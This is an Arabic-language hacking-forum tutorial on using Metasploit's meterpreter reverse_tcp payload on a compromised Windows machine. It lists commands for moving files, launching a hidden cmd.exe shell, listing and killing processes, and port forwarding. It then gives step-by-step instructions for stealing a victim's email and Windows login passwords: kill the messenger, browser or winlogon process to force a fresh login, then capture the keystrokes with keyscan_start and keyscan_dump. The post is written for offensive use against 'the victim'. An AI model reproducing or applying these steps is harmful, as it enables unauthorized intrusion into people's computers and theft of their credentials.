استخدام بايلود الـ meterpreter للتحميل وتسجيل كلمات السر والدخول وغير ذلك,,
إن من ما تقدمه هذه البايلود , هو خصائص كثيرة وكتير حلوة .. فإنها تغنيك عن الإتصال العكسي لأن وأنت بداخلها تقدر تتحكم بالدوس وأي أمر تاني .. إلا أنها أفضل من الإتصال العكسي
لأنه مقتصر على الإتصال مع الدوس .. بينما هذه تمكنك من أن تشبك مع أي بروسيس .. وتشغيله,,وتخليك تشوف البروسيس اللي عم يشتغلو ..المهم البايلود هي ..
windows/meterpreter/reverse_tcp
أذكر أن العكسي أفضل من المباشر ..
وبعد ان نطبق الثغرة كما ورد في الدروس السابقة , ونختار البايلود meterpreter .. وندخل ..
نكتب كالعادة help حتى نشوف الأوامر ..
والبعض قال أن الباتشات تمكنك من التحميل منجهاز الضحية .. أقول أيضا الميتاسبلويت .. عبر ال meterpreter فإن ألأوامر ...
upload ..
download للتحميل ..
cd للتنقل بين المجلدات ..
ls لعرض الملفات ..
وغير ذلك من الأوامر.....للملفات ..
وأيضا هذه البايلود .. تمكنك من أن تشغل برنامج وتتفاعل معه .. ويمكننا أن نتفاعل مع الدوس عادي وكأننا بإتصال عكسي ..
نفذ الأمر execute وشوف الأوامر
لتشغيل الدوس نختار
execute -H -c -f cmd.exe
H مخفي
f للتفاعل معه
وإذا قرأنا المساعدة نعرف كل واحدة شو وظيفتها ..
وبعد ما نكون نفذنا الأمر .. فإنه يحصل على رقم قناة خاصة فيه .. channel ,, وللدخول والتفاعل معها نكتب
interact 10
ونقدر نشوف البروسيس المشغلينهم بواسطة هذا الأمر
ps
ويطلع حد كل بروسيس رقمها
ونقدر نقتل أي بروسيس نريد فقط بكتابة
kill PID
PID هو رقم البروسيس
كود PHP [url=http://www.freewebtown.com/minikvn/1.jpg ]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [/url]
ليس هذا فقط .. بل وأيضا هناك أوامر أخرى كثير من تعديل لللأيبيهات .. وفتح بورت خاص portfwd لكي تتصل متى شئت وغير ذلك..
========
========
أما الأن فنأتي للمهم .. يقول البعض .. برامج الإختراق تجيب الباسووردات .. أنا بقول نعم يا scribt kiddies .. إنها كذلك .. وأيضا الميتا يجيب الباسووردات . وفيه كي لوجر
-----
-----
أخوان شغلو عقلكن شوي .. لنفرض أنك تريد سرقة إيميل الضحية .. اممم .. فكر .. يعني أنه فاتح ال msn او yahoo او inbox ممممم .. طيب . . كل شي وعنده بروسيس
أولا نعرض البروسيس اللي عم يشتغلو
ps
.. منلاقي أن msnmsngr.exe شغال .. يعني الضحية فاتح الإيميل ..
نشوف رقمه يعني ال PID .. ونقتله (ممكن يكون فاتح صندوق الوارد inbox عبر تشغيل internet explore ) نشوف شو البروسيس ونقتله
kill PID
الأن المسنجر سكر عند الضحية وهو رح يدخل من جديد .. نحنا بسرعه نفعل الكيلوجر .. ونكتب
keyscan_start
والبرنامج يبدأ بالتسجيل Starting the keystroke sniffer
ثم نكتب
keyscan_dump
فيعرض لنا ما كتبه الضحية Dumping captured keystroke
.. هكذا نكون حصلنا على كلمة سر الإيميل ..
وأيضا يمكننا ان نحصل على كلمة سر الدخول للجهاز على نفس الطريقة لكنننا هنا نقتل البروسيس winlogon.exe ونشغل الكيلوجر عادي ..
..
إعادة سريعة للأوامر
ps
kill PID
keyscan_start
keyscan_dump
كود PHP:
[url=http://www.freewebtown.com/minikvn/2.jpg ]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [/url]